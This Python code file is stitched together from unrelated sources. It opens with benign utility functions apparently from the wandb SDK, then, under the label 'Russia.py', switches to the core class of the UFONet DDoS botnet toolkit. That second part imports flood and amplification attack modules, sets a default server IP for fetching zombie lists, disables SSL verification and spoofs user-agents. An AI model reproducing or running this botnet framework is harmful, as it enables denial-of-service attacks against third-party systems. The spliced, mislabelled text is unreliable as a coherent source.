tmp_obj, converted = json_friendly(obj)
tmp_obj, compressed = maybe_compress_summary(tmp_obj, get_h5_typename(obj))
if converted:
return tmp_obj
return json.JSONEncoder.default(self, tmp_obj)
class WandBHistoryJSONEncoder(json.JSONEncoder):
"""A JSON Encoder that handles some extra types.
This encoder turns numpy like objects with a size > 32 into histograms"""
def default(self, obj):
obj, converted = json_friendly(obj)
obj, compressed = maybe_compress_history(obj)
if converted:
return obj
return json.JSONEncoder.default(self, obj)
class JSONEncoderUncompressed(json.JSONEncoder):
"""A JSON Encoder that handles some extra types.
This encoder turns numpy like objects with a size > 32 into histograms"""
def default(self, obj):
if is_numpy_array(obj):
return obj.tolist()
elif np and isinstance(obj, np.generic):
obj = obj.item()
return json.JSONEncoder.default(self, obj)
def json_dump_safer(obj, fp, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dump(obj, fp, cls=WandBJSONEncoder, **kwargs)
def json_dumps_safer(obj, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dumps(obj, cls=WandBJSONEncoder, **kwargs)
# This is used for dumping raw json into files
def json_dump_uncompressed(obj, fp, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dump(obj, fp, cls=JSONEncoderUncompressed, **kwargs)
def json_dumps_safer_history(obj, **kwargs):
"""Convert obj to json, with some extra encodable types, including histograms"""
return json.dumps(obj, cls=WandBHistoryJSONEncoder, **kwargs)
def make_json_if_not_number(v):
"""If v is not a basic type convert it to json."""
if isinstance(v, (float, int)):
return v
return json_dumps_safer(v)
def make_safe_for_json(obj):
"""Replace invalid json floats with strings. Also converts to lists and dicts."""
if isinstance(obj, Mapping):
return {k: make_safe_for_json(v) for k, v in obj.items()}
elif isinstance(obj, str):
# str's are Sequence, so we need to short-circuit
return obj
elif isinstance(obj, Sequence):
return [make_safe_for_json(v) for v in obj]
elif isinstance(obj, float):
# W&B backend and UI handle these strings
if obj != obj: # standard way to check for NaN
return "NaN"
elif obj == float("+inf"):
return "Infinity"
elif obj == float("-inf"):
return "-Infinity"
return obj
def mkdir_exists_ok(path):
try:
os.makedirs(path)
return True
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
return False
else:
raise
def no_retry_auth(e):
if hasattr(e, "exception"):
e = e.exception
if not isinstance(e, requests.HTTPError):
return True
# Don't retry bad request errors; raise immediately
if e.response.status_code == 400:
return False
# Retry all non-forbidden/unauthorized/not-found errors.
if e.response.status_code not in (401, 403, 404):
return True
# Crash w/message on forbidden/unauthorized errors.
if e.response.status_code == 401:
raise CommError("Invalid or missing api_key. Run wandb login")
elif wandb.run:
raise CommError("Permission denied to access {}".format(wandb.run.path))
else:
raise CommError("Permission denied, ask the project owner to grant you access")
def request_with_retry(func, *args, **kwargs):
"""Perform a requests http call, retrying with exponential backoff.
Arguments:
func: An http-requesting function to call, like requests.post
max_retries: Maximum retries before giving up. By default we retry 30 times in ~2 hours before dropping the chunk
*args: passed through to func
**kwargs: passed through to func
"""
max_retries = kwargs.pop("max_retries", 30)
retry_callback = kwargs.pop("retry_callback", None)
sleep = 2
retry_count = 0
while True:
try:
response = func(*args, **kwargs)
response.raise_for_status()
return response
except (
requests.exceptions.ConnectionError,
requests.exceptions.HTTPError,
requests.exceptions.Timeout,
) as e:
if isinstance(e, requests.exceptions.HTTPError):
# Non-retriable HTTP errors.
#
# We retry 500s just to be cautious, and because the back end
# returns them when there are infrastructure issues. If retrying
# some request winds up being problematic, we'll change the
# back end to indicate that it shouldn't be retried.
if (
e.response is not None
and e.response.status_code in {400, 403, 404, 409}
) or (
e.response is not None
and e.response.status_code == 500
and e.response.content == b'{"error":"context deadline exceeded"}\n'
):
return e
if retry_count == max_retries:
return e
retry_count += 1
delay = sleep + random.random() * 0.25 * sleep
if isinstance(e, requests.exceptions.HTTPError) and (
e.response is not None and e.response.status_code == 429
):
err_str = "Filestream rate limit exceeded, retrying in {} seconds".format(
delay
)
if retry_callback:
retry_callback(e.response.status_code, err_str)
logger.info(err_str)
else:
pass
logger.warning(
"requests_with_retry encountered retryable exception: %s. func: %s, args: %s, kwargs: %s",
e,
func,
args,
kwargs,
)
time.sleep(delay)
sleep *= 2
if sleep > MAX_SLEEP_SECONDS:
sleep = MAX_SLEEP_SECONDS
except requests.exceptions.RequestException as e:
logger.error(response.json()["error"]) # XXX clean this up
logger.exception(
"requests_with_retry encountered unretryable exception: %s", e
)
return e
def find_runner(program):
"""Return a command that will run program.
Arguments:
program: The string name of the program to try to run.
Returns:
commandline list of strings to run the program (eg. with subprocess.call()) or None
"""
if os.path.isfile(program) and not os.access(program, os.X_OK):
# program is a path to a non-executable file
try:
opened = open(program)
except IOError: # PermissionError doesn't exist in 2.7
return None
first_line = opened.readline().strip()
if first_line.startswith("#!"):
return shlex.split(first_line[2:])
if program.endswith(".py"):
return [sys.executable]
return None
def downsample(values, target_length):
"""Downsamples 1d values to target_length, including start and end.
Algorithm just rounds index down.
Values can be any sequence, including a generator.
"""
assert target_length > 1
values = list(values)
if len(values) < target_length:
return values
ratio = float(len(values) - 1) / (target_length - 1)
result = []
for i in range(target_length):
result.append(values[int(i * ratio)])
return result
import numbers
def has_num(dictionary, key):
return key in dictionary and isinstance(dictionary[key], numbers.Number)
def md5_file(path):
hash_md5 = hashlib.md5()
with open(path, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return base64.b64encode(hash_md5.digest()).decode("ascii")
def get_log_file_path():
"""Log file path used in error messages.
It would probably be better if this pointed to a log file in a
run directory.
"""
# TODO(jhr, cvp): refactor
if wandb.run:
return wandb.run._settings.log_internal
return os.path.join("wandb", "debug-internal.log")
def docker_image_regex(image):
"regex for valid docker image names"
if image:
return re.match(
r"^(?:(?=[^:\/]{1,253})(?!-)[a-zA-Z0-9-]{1,63}(?<!-)(?:\.(?!-)[a-zA-Z0-9-]{1,63}(?<!-))*(?::[0-9]{1,5})?/)?((?![._-])(?:[a-z0-9._-]*)(?<![._-])(?:/(?![._-])[a-z0-9._-]*(?<![._-]))*)(?::(?![.-])[a-zA-Z0-9_.-]{1,128})?$",
image,
)
def image_from_docker_args(args):
"""This scans docker run args and attempts to find the most likely docker image argument.
If excludes any argments that start with a dash, and the argument after it if it isn't a boolean
switch. This can be improved, we currently fallback gracefully when this fails.
"""
bool_args = [
"-t",
"--tty",
"--rm",
"--privileged",
"--oom-kill-disable",
"--no-healthcheck",
"-i",
"--interactive",
"--init",
"--help",
"--detach",
"-d",
"--sig-proxy",
"-it",
"-itd",
]
last_flag = -2
last_arg = ""
possible_images = []
if len(args) > 0 and args[0] == "run":
args.pop(0)
for i, arg in enumerate(args):
if arg.startswith("-"):
last_flag = i
last_arg = arg
elif "@sha256:" in arg:
# Because our regex doesn't match digests
possible_images.append(arg)
elif docker_image_regex(arg):
if last_flag == i - 2:
possible_images.append(arg)
elif "=" in last_arg:
possible_images.append(arg)
elif last_arg in bool_args and last_flag == i - 1:
possible_images.append(arg)
most_likely = None
for img in possible_images:
if ":" in img or "@" in img or "/" in img:
most_likely = img
break
if most_likely == None and len(possible_images) > 0:
most_likely = possible_images[0]
return most_likely
def load_yaml(file):
"""If pyyaml > 5.1 use full_load to avoid warning"""
if hasattr(yaml, "full_load"):
return yaml.full_load(file)
else:
return yaml.load(file)
def image_id_from_k8s():
"""Pings the k8s metadata service for the image id. Specify the
KUBERNETES_NAMESPACE environment variable if your pods are not in
the default namespace:
- name: KUBERNETES_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
"""
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"
if os.path.exists(token_path):
k8s_server = "https://{}:{}/api/v1/namespaces/{}/pods/{}".format(
os.getenv("KUBERNETES_SERVICE_HOST"),
os.getenv("KUBERNETES_PORT_443_TCP_PORT"),
os.getenv("KUBERNETES_NAMESPACE", "default"),
os.getenv("HOSTNAME"),
)
try:
res = requests.get(
k8s_server,
verify="/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
timeout=3,
headers={"Authorization": "Bearer {}".format(open(token_path).read())},
)
res.raise_for_status()
except requests.RequestException:
return None
try:
return res.json()["status"]["containerStatuses"][0]["imageID"].strip(
"docker-pullable://"
)
except (ValueError, KeyError, IndexError):
logger.exception("Error checking kubernetes for image id")
return None
def async_call(target, timeout=None):
"""Accepts a method and optional timeout.
Returns a new method that will call the original with any args, waiting for upto timeout seconds.
This new method blocks on the original and returns the result or None
if timeout was reached, along with the thread.
You can check thread.is_alive() to determine if a timeout was reached.
If an exception is thrown in the thread, we reraise it.
"""
q = queue.Queue()
def wrapped_target(q, *args, **kwargs):
try:
q.put(target(*args, **kwargs))
except Exception as e:
q.put(e)
def wrapper(*args, **kwargs):
thread = threading.Thread(
target=wrapped_target, args=(q,) + args, kwargs=kwargs
)
thread.daemon = True
thread.start()
try:
result = q.get(True, timeout)
if isinstance(result, Exception):
six.reraise(type(result), result, sys.exc_info()[2])
return result, thread
except queue.Empty:
return None, thread
return wrapper
def read_many_from_queue(q, max_items, queue_timeout):
try:
item = q.get(True, queue_timeout)
except queue.Empty:
return []
items = [item]
for i in range(max_items):
try:
item = q.get_nowait()
except queue.Empty:
return items
items.append(item)
return items
def stopwatch_now():
"""Get a timevalue for interval comparisons
When possible it is a monotonic clock to prevent backwards time issues.
"""
if six.PY2:
now = time.time()
else:
now = time.monotonic()
return now
def class_colors(class_count):
# make class 0 black, and the rest equally spaced fully saturated hues
return [[0, 0, 0]] + [
colorsys.hsv_to_rgb(i / (class_count - 1.0), 1.0, 1.0)
for i in range(class_count - 1)
]
def guess_data_type(shape, risky=False):
"""Infer the type of data based on the shape of the tensors
Arguments:
risky(bool): some guesses are more likely to be wrong.
"""
# (samples,) or (samples,logits)
if len(shape) in (1, 2):
return "label"
# Assume image mask like fashion mnist: (no color channel)
# This is risky because RNNs often have 3 dim tensors: batch, time, channels
if risky and len(shape) == 3:
return "image"
if len(shape) == 4:
if shape[-1] in (1, 3, 4):
# (samples, height, width, Y \ RGB \ RGBA)
return "image"
else:
# (samples, height, width, logits)
return "segmentation_mask"
return None
def download_file_from_url(dest_path, source_url, api_key=None):
response = requests.get(source_url, auth=("api", api_key), stream=True, timeout=5)
response.raise_for_status()
if os.sep in dest_path:
mkdir_exists_ok(os.path.dirname(dest_path))
with fsync_open(dest_path, "wb") as file:
for data in response.iter_content(chunk_size=1024):
file.write(data)
def isatty(ob):
return hasattr(ob, "isatty") and ob.isatty()
def to_human_size(bytes, units=None):
units = units or POW_10_BYTES
unit, value = units[0]
factor = round(float(bytes) / value, 1)
return (
"{}{}".format(factor, unit)
if factor < 1024 or len(units) == 1
else to_human_size(bytes, units[1:])
)
def from_human_size(size, units=None):
units = {unit.upper(): value for (unit, value) in units or POW_10_BYTES}
regex = re.compile(
r"(\d+\.?\d*)\s*({})?".format("|".join(units.keys())), re.IGNORECASE
)
match = re.match(regex, size)
if not match:
raise ValueError("Size must be of the form `10`, `10B` or `10 B`.")
factor, unit = (
float(match.group(1)),
units[match.group(2).upper()] if match.group(2) else 1,
)
return int(factor * unit)
def auto_project_name(program):
# if we're in git, set project name to git repo name + relative path within repo
root_dir = wandb.wandb_sdk.lib.git.GitRepo().root_dir
if root_dir is None:
return "uncategorized"
# On windows, GitRepo returns paths in unix style, but os.path is windows
# style. Coerce here.
root_dir = to_native_slash_path(root_dir)
repo_name = os.path.basename(root_dir)
if program is None:
return repo_name
if not os.path.isabs(program):
program = os.path.join(os.curdir, program)
prog_dir = os.path.dirname(os.path.abspath(program))
if not prog_dir.startswith(root_dir):
return repo_name
project = repo_name
sub_path = os.path.relpath(prog_dir, root_dir)
if sub_path != ".":
project += "-" + sub_path
return project.replace(os.sep, "_")
def parse_sweep_id(parts_dict):
"""In place parse sweep path from parts dict.
Arguments:
parts_dict (dict): dict(entity=,project=,name=). Modifies dict inplace.
Returns:
None or str if there is an error
"""
entity = None
project = None
sweep_id = parts_dict.get("name")
if not isinstance(sweep_id, six.string_types):
return "Expected string sweep_id"
sweep_split = sweep_id.split("/")
if len(sweep_split) == 1:
pass
elif len(sweep_split) == 2:
split_project, sweep_id = sweep_split
project = split_project or project
elif len(sweep_split) == 3:
split_entity, split_project, sweep_id = sweep_split
project = split_project or project
entity = split_entity or entity
else:
return (
"Expected sweep_id in form of sweep, project/sweep, or entity/project/sweep"
)
parts_dict.update(dict(name=sweep_id, project=project, entity=entity))
def to_forward_slash_path(path):
if platform.system() == "Windows":
path = path.replace("\\", "/")
return path
def to_native_slash_path(path):
return path.replace("/", os.sep)
def bytes_to_hex(bytestr):
# Works in python2 / python3
return codecs.getencoder("hex")(bytestr)[0].decode("ascii")
def check_and_warn_old(files):
if "wandb-metadata.json" in files:
wandb.termwarn("These runs were logged with a previous version of wandb.")
wandb.termwarn(
"Run pip install wandb<0.10.0 to get the old library and sync your runs."
)
return True
return False
class ImportMetaHook:
def __init__(self):
self.modules = {}
self.on_import = {}
def add(self, fullname, on_import):
self.on_import.setdefault(fullname, []).append(on_import)
def install(self):
sys.meta_path.insert(0, self)
def uninstall(self):
sys.meta_path.remove(self)
def find_module(self, fullname, path=None):
if fullname in self.on_import:
return self
def load_module(self, fullname):
self.uninstall()
mod = importlib.import_module(fullname)
self.install()
self.modules[fullname] = mod
on_imports = self.on_import.get(fullname)
if on_imports:
for f in on_imports:
f()
return mod
def get_modules(self):
return tuple(self.modules)
def get_module(self, module):
return self.modules[module]
_import_hook = None
def add_import_hook(fullname, on_import):
global _import_hook
if _import_hook is None:
_import_hook = ImportMetaHook()
_import_hook.install()
_import_hook.add(fullname, on_import)
def b64_to_hex_id(id_string):
return binascii.hexlify(base64.standard_b64decode(str(id_string))).decode("utf-8")
def hex_to_b64_id(encoded_string):
return base64.standard_b64encode(binascii.unhexlify(encoded_string)).decode("utf-8")
def host_from_path(path):
"""returns the host of the path"""
url = urlparse(path)
return url.netloc
def uri_from_path(path):
"""returns the URI of the path"""
url = urlparse(path)
return url.path if url.path[0] != "/" else url.path[1:]
def _has_internet():
"""Attempts to open a DNS connection to Googles root servers"""
try:
s = socket.create_connection(("8.8.8.8", 53), 0.5)
s.close()
return True
except OSError:
return False
def rand_alphanumeric(length=8, rand=None):
rand = rand or random
return "".join(rand.choice("0123456789ABCDEF") for _ in range(length))
@contextlib.contextmanager
def fsync_open(path, mode="w"):
"""
Opens a path for I/O, guaranteeing that the file is flushed and
fsynced when the file's context expires.
"""
with open(path, mode) as f:
yield f
f.flush()
os.fsync(f.fileno())
def _is_kaggle():
return (
os.getenv("KAGGLE_KERNEL_RUN_TYPE") is not None
or "kaggle_environments" in sys.modules # noqa: W503
)
def _is_likely_kaggle():
# Telemetry to mark first runs from Kagglers.
return (
_is_kaggle()
or os.path.exists(
os.path.expanduser(os.path.join("~", ".kaggle", "kaggle.json"))
)
or "kaggle" in sys.modules
)
def _is_databricks():
# check if we are running inside a databricks notebook by
# inspecting sys.modules, searching for dbutils and verifying that
# it has the appropriate structure
if "dbutils" in sys.modules:
dbutils = sys.modules["dbutils"]
if hasattr(dbutils, "shell"):
shell = dbutils.shell
if hasattr(shell, "sc"):
sc = shell.sc
return sc.appName == "Databricks Shell"
return False
|
Russia.py
|
import os, sys, re, traceback, random, time, threading, base64, string, math
import io, socket, ssl, cgi, json, gzip
try:
from urllib.parse import urlparse as urlparse
except:
from urlparse import urlparse as urlparse
try:
import urllib.request, urllib.error, urllib.parse
except:
print ("\nRussia needs to fall, Swifty Bois.\n")
sys.exit()
from uuid import getnode
from random import randrange, shuffle
from .options import UFONetOptions
from .update import Updater
from .herd import Herd
from .zombie import Zombie
from .doll import Doll
from core.tools.inspector import Inspector
from core.tools.abductor import Abductor
from core.tools.ufoscan import UFOSCAN
from core.mods.loic import LOIC
from core.mods.loris import LORIS
from core.mods.ufosyn import UFOSYN
from core.mods.spray import SPRAY
from core.mods.smurf import SMURF
from core.mods.xmas import XMAS
from core.mods.nuke import NUKE
from core.mods.tachyon import TACHYON
from core.mods.monlist import MONLIST
from core.mods.sniper import SNIPER
from core.mods.ufoack import UFOACK
from core.mods.uforst import UFORST
from core.mods.droper import DROPER
from core.mods.overlap import OVERLAP
from core.mods.pinger import PINGER
from core.mods.ufoudp import UFOUDP
from core.mods.fraggle import FRAGGLE
DEBUG = False # use 'True' for detailed traceback
class UFONet(object):
def __init__(self):
self.exit_msg = 'Donate BTC (Bitcoin) to keep UFONet (https://ufonet.03c8.net) strong!' # set msg show at the end [FILO ;-)]
self.blackhole = '46.163.118.220' # default download/upload zombies [Blackhole] [Server] / Try [DIY] your own [Mirror]...
self.GIT_REPOSITORY = 'https://code.03c8.net/epsylon/ufonet' # oficial code source [OK! 22/12/2018]
self.GIT_REPOSITORY2 = 'https://github.com/epsylon/ufonet' # mirror source [since: 04/06/2018]
self.github_zombies = 'https://raw.githubusercontent.com/epsylon/ufonet/master/botnet/' # default [RAW] download/upload zombies [Blackhole] [GitHub] [DIY]
self.external_check_service1 = 'https://status.ws/' # set external check service 1 [OK! 26/02/2020]
self.external_check_service2 = 'https://downforeveryoneorjustme.com/' # set external check service 2 [OK! 26/02/2020]
self.check_tor_url = 'https://check.torproject.org/' # TOR status checking site
self.check_ip_service1 = 'https://checkip.org/' # set external check ip service 1 [OK! 06/06/2020]
self.check_ip_service2 = 'https://whatismyip.org/' # set external check ip service 2 [OK! 06/06/2020]
self.check_ip_service3 = 'https://ip.42.pl/ra' # set external check ip service 3 [OK! [06/06/2020]
self.agents_file = 'core/txt/user-agents.txt' # set source path to retrieve user-agents
self.motherships_file = 'core/txt/motherships.txt' # set source path to retrieve mothership names
self.zombies_file = 'botnet/zombies.txt' # set source path to retrieve [Zombies]
self.aliens_file = 'botnet/aliens.txt' # set source path to retrieve [Aliens]
self.dnss_file = 'botnet/dns.txt' # set source path to retrieve [DNSs]
self.droids_file = 'botnet/droids.txt' # set source path to retrieve [Droids]
self.ucavs_file = 'botnet/ucavs.txt' # set source path to retrieve 'ucavs'
self.rpcs_file = 'botnet/rpcs.txt' # set source path to retrieve 'rpcs'
self.ntps_file = 'botnet/ntp.txt' # set source path to retrieve [NTPs]
self.snmps_file = 'botnet/snmp.txt' # set source path to retrieve [SNMPs]
self.humans_file = 'botnet/humans.txt' # set source path to retrieve 'humans'
self.dorks_file = 'botnet/dorks.txt' # set source path to retrieve [Dorks]
self.mothership_stats_file = 'core/json/stats.json' # set source for mothership stats
self.timeline_file = 'docs/VERSION' # set source for code releases
self.links_file = "data/links.txt" # set source path to retrieve [Blackhole] [Links]
self.streams_file = "data/streams.txt" # set source path to retrieve [Blackhole] [Streams]
self.globalnet_file = "data/globalnet.txt" # set source path to retrieve [Blackhole] [Globalnet]
self.news_file = "data/news.txt" # set source path to retrieve [Blackhole] [News]
self.tv_file = "data/tv.txt" # set source path to retrieve [Blackhole] [TV]
self.missions_file = "data/missions.txt" # set source path to retrieve [Blackhole] [Missions]
self.board_file = "data/board.txt" # set source path to retrieve [Blackhole] [Board]
self.grid_file = "data/grid.txt" # set source path to retrieve [Blackhole] [Grid]
self.wargames_file = "data/wargames.txt" # set source path to retrieve [Blackhole] [Wargames]
self.examples_file = "docs/examples.txt" # set source path to retrieve [Examples]
self.misc_file = "core/txt/misc.txt" # set source path to retrieve [Miscellania] cites
self.referer = '' # black magic
self.port = "8080" # default injection port
self.mothershipname = "core/txt/shipname.txt"
self.default_mothership_name = "l4m3r-lulz/0\n" # default mothership name
self.mothership_model_file = 'core/txt/model.txt' # set source for mothership model
self.warping_path = '/var/www/ufonet' # set source for warping path
self.warping_folder_permissions = 0o644 # set permission for warping folder
f = open(self.mothership_model_file) # extract mothership model
self.mothership_model = f.readlines()
for model in self.mothership_model:
model = model.rstrip('\n')
self.mothership_model = model
f.close()
self.mothership_baptism() # generating static name/id for your mothership ;-)
self.head = False
self.payload = False
self.external = False
self.attack_mode = False
self.connection_failed = False
self.total_possible_zombies = 0
self.herd = Herd(self)
self.sem = False
self.db_flash = 0 # db stress counter
self.total_aliens = 0
self.aliens_hit = 0
self.aliens_fail = 0
self.total_droids = 0
self.droids_hit = 0
self.droids_fail = 0
self.total_ucavs = 0
self.ucavs_hit = 0
self.ucavs_fail = 0
self.total_rpcs = 0
self.rpcs_hit = 0
self.rpcs_fail = 0
self.total_loic = 0
self.total_loris = 0
self.total_syn = 0
self.total_spray = 0
self.total_smurf = 0
self.total_fraggle = 0
self.total_xmas = 0
self.total_ufoack = 0
self.total_uforst = 0
self.total_droper = 0
self.total_overlap = 0
self.total_pinger = 0
self.total_ufoudp = 0
self.total_nuke = 0
self.total_tachyon = 0
self.total_monlist = 0
self.total_sniper = 0
self.total_zombies_failed_connection = 0
self.ctx = ssl.create_default_context() # creating context to bypass SSL cert validation (black magic)
self.ctx.check_hostname = False
self.ctx.verify_mode = ssl.CERT_NONE
self.nat_error_flag = "OFF"
self.trans_zombies = 0
self.scanned_zombies = 0
self.loadcheck_counter = 0
self.loadcheck_prev_size = None
self.loadcheck_prev_load = None
self.loadcheck_first_size = None
self.loadcheck_first_load = None
self.loadcheck_size_list = []
self.loadcheck_load_list = []
self.loadcheck_size_median = None
self.loadcheck_size_max = None
self.loadcheck_size_min = None
self.loadcheck_load_median = None
self.loadcheck_size_max = None
self.loadcheck_size_min = None
self.num_is_up = 0 # counter for [UCAVs] 'up' reports
self.num_is_down = 0 # counter for [UCAVs] 'down' reports
self.expire_timing = 30 # default expiring time per round
self.extra_zombies_lock = False # used to lock threading flow when [ARMY] is required
self.ac_control = [] # used by 'herd.py' to lock threading flow when [Zombies] are returning
def mothership_baptism(self):
if os.path.exists(self.mothershipname) == True:
f = open(self.mothershipname)
self.mothership_id = f.read()
f.close()
else:
self.mothership_ids = []
try:
f = open(self.motherships_file)
motherships = f.readlines()
f.close()
for ship in motherships:
ship = ship.encode("utf-8")
self.mothership_ids.append(base64.urlsafe_b64encode(ship))
try:
self.mothership_id = str(base64.b64decode(random.choice(self.mothership_ids).strip()), 'utf-8')
except:
try:
self.mothership_id = str(base64.b64decode(random.choice(self.mothership_ids).strip()), 'latin-1')+"\n" # id (hack&slash!) creation ;-)
except:
self.mothership_id = self.default_mothership_name
except:
self.mothership_id = self.default_mothership_name
if len(str(self.mothership_id.upper())) > 20: # motherhip naming anti-cheating! ;-)
self.mothership_id = self.default_mothership_name
m = open(self.mothershipname, "w") # write mothership name to a static file
m.write(str(self.mothership_id.upper()))
m.close()
def create_options(self, args=None):
self.optionParser = UFONetOptions()
self.options = self.optionParser.get_options(args)
if not self.options:
return False
return self.options
def banner_welcome(self):
print(" ____ ")
print(" || / /\ \ || #===============================================#")
print(" -(00)- + (XX) + -(00)- || ||")
print(" || || O ==*~~~~~~*== 0 || || || > Botnet [DDoS] # > Close Combat [DoS] ||")
print(" -(00)- (0) XX (0) -(00)- || ||")
print(" || \| (00) |/ || || |-> ZOMBIES # |-> LOIC ||")
print(" (O)_ (O) 0'----'0 (O) _(O) || |-> DROIDS # |-> LORIS ||")
print(" | |.''.( xx ).''.| | || |-> ALIENS # |-> UFOSYN ||")
print(" .'.' X|'..'|X '.'. || |-> UCAVs # |-> XMAS ||")
print(" .-. .' /'--.__|_00_|__.--'\ '. .-. || |-> X-RPCs # |-> NUKE ||")
print(" (O).)-|0| \ x| ## |x / |0|-(.(O) || |-> DBSTRESS # |-> UFOACK ||")
print(" `-' '-'-._'-./ -00- \.-'_.-'-' `-' || |-> SPRAY # |-> UFORST ||")
print(" _ | || '-.___||___.-' || | _ || |-> SMURF # |-> DROPER ||")
print(" .' _ | ||==O | __ | O==|| | _ '. || |-> TACHYON # |-> OVERLAP ||")
print(" / .' ''.| || | /_00_\ | || |.'' '. \ || |-> MONLIST # |-> PINGER ||")
print(" | '### | =| | ###### | |= |' ### | || |-> FRAGGLE # |-> UFOUDP ||")
print(" | |(0)| '. 0\||__**_ ||/0 .' |(0)| | || |-> SNIPER # ||")
print(" \ '._.' '. | \_##_/ | .' '._.' / || ||")
print(" '.__ ____0_'.|__'--'__|.'_0____ __.' #|=============================================|#")
print(" .'_.-| YY |-._'. || ||")
print(" || -> [ UFONet: https://ufonet.03c8.net ] <- ||")
print(" + Class: PSYoPs / "+str(self.mothership_model)+" + || ||")
print(" #|=============================================|#")
print("")
def banner(self):
print('='*75, "\n")
print("888 888 8888888888 .d88888b. 888b 888 888 ")
print("888 888 888 d88P Y888b 8888b 888 888 ")
print("888 888 888 888 888 88888b 888 888 ")
print("888 888 8888888 888 888 888Y88b 888 .d88b. 888888 ")
print("888 888 888 888 888 888 Y88b888 d8P Y8b 888 ")
print("888 888 888 888 888 888 Y88888 88888888 888 ")
print("Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b. ")
print(" 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888")
print(self.optionParser.description, "\n")
print('='*75)
def generate_exit_msg(self):
self.exit_msg = "Generating random exit... \n\n"
try:
f = open(self.misc_file)
m = f.readlines()
f.close()
self.exit_msg += " -> "+str(random.choice(m).strip())
except:
self.exit_msg += " -> Donate BTC (Bitcoin) to keep #UFONet (https://ufonet.03c8.net) strong!"
def AI(self):
try:
import turtle as AI
print("\n[AI] Making a unique drawing using 'Turtle' (Feurzig & Papert - 1966) -> [OK!]\n")
colors = ['red', 'purple', 'blue', 'green', 'orange', 'yellow']
bg = random.choice(colors).strip()
t = AI.Pen()
AI.bgcolor(bg)
r = random.randrange(100,100000)
for x in range(r):
t.pencolor(colors[x%6])
w = random.randrange(100,1000)
t.width(x/w + 1)
t.forward(x)
l = random.randrange(50,1000)
t.left(l)
except:
print("[AI] %!$1#9#84#~... -> [Exiting!]")
pass
def round_float(self, num):
return str(int(round(num, -1)))[2] # black magic
def show_mac_address(self):
mac = getnode() # to get physical address
hex_mac = str(":".join(re.findall('..', '%012x' % mac)))
return hex_mac
def show_ips(self):
import requests
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
private_ip = s.getsockname()[0] # black magic
s.close()
except:
private_ip = "Unknown"
try:
public_ip = requests.get(self.check_ip_service3).text
except:
try:
public_ip = requests.get(self.check_ip_service2).text
except:
try:
public_ip = requests.get(self.check_ip_service1).text
except:
public_ip = "Unknown"
return private_ip, public_ip
def try_running(self, func, error, args=None):
options = self.options
args = args or []
try:
return func(*args)
except Exception as e:
if DEBUG == True:
print(error, "error")
traceback.print_exc()
def checkeuid(self):
try:
euid = os.geteuid()
except:
print("[Error] [AI] [UFONet] doesn't work correctly in systems with closed licenses...-> [Exiting!]\n")
print("[AI] "+self.exit_msg+"\n")
sys.exit(2) # return
return euid
def start_ship_engine(self):
self.agents = [] # generating available user-agents
f = open(self.agents_file)
agents = f.readlines()
f.close()
for agent in agents:
self.agents.append(agent)
self.user_agent = random.choice(self.agents).strip()
self.search_engines = [] # available dorking search engines
self.search_engines.append('bing') # [13/07/2021: OK!]
self.search_engines.append('yahoo') # [13/07/2021: OK!]
self.search_engines.append('duck') # [13/07/2021: OK!]
#self.search_engines.append('startpage') # [01/02/2020: deprecated! -> blocking instream params search]
#self.search_engines.append('yandex') # [03/02/2018: deprecated! -> captchasound]
#self.search_engines.append('google') # [09/08/2016: modified -> not working from TOR]
if not os.path.exists("core/json/"): # create gui json cfg files folder
os.mkdir("core/json/")
self.banner_welcome()
self.update_flying_stats() # update flying time stats
chargo = self.check_mothership_chargo() # check mothership chargo
self.update_max_chargo(int(chargo)) # update max chargo stats
self.generate_exit_msg() # generate random exit msg
def run(self, opts=None):
if opts:
self.create_options(opts)
options = self.options
# start threads
if not self.options.threads:
self.options.threads=5 # default number of threads
self.sem = threading.Semaphore(self.options.threads)
# start ship engine
self.start_ship_engine()
# check proxy options
proxy = options.proxy
if options.proxy:
try:
pattern = 'http[s]?://(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]):[0-9][0-9][0-9][0-9]'
m = re.search(pattern, proxy)
if m is None:
self.banner()
print ("\n[Error] [AI] Proxy malformed! (ex: 'http(s)://127.0.0.1:8118') -> [Exiting!]\n")
return
else:
self.proxy_transport(options.proxy) # create proxy transport (also here, to be sure)
except Exception:
self.banner()
print ("\n[Error] [AI] Proxy malformed! (ex: 'http(s)://127.0.0.1:8118') -> [Exiting!]\n")
return
# check tor connection
if options.checktor:
url = self.check_tor_url # TOR status checking site
self.banner()
print("\nSending request to: " + url + "\n")
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
try:
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
req = urllib.request.Request(url, None, headers)
tor_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
your_ip = tor_reply.split('<strong>')[1].split('</strong>')[0].strip() # extract public IP
if not tor_reply or 'Congratulations' not in tor_reply:
print("It seems that Tor is not properly set.\n")
print(("IP address appears to be: " + your_ip + "\n"))
else:
print("Congratulations!. Tor is properly being used :-)\n")
print(("IP address appears to be: " + your_ip + "\n"))
except:
print("Cannot reach TOR checker system!. Are you correctly connected?\n")
sys.exit(2) # return
# run AES256+HMAC-SHA1 enc/dec tool
if options.cryptomsg:
from core.tools.crypter import Cipher
print(" " + '='*44)
print(" ")
print(" ____...------------...____ ")
print(" _.-'' /o/__ ____ __ __ __ \o\_`'-._ ")
print(" .' / / \ \ '. ")
print(" |=====/o/======================\o\=====| ")
print(" |____/_/________..____..________\_\____| ")
print(" / _/ \_ <_o#\__/#o_> _/ \_ \ ")
print(" \__/_____\####/0213411543/####/_____\__/ ")
print(" |===\!/========================\!/===| ")
print(" | |=| .---. |=| | ")
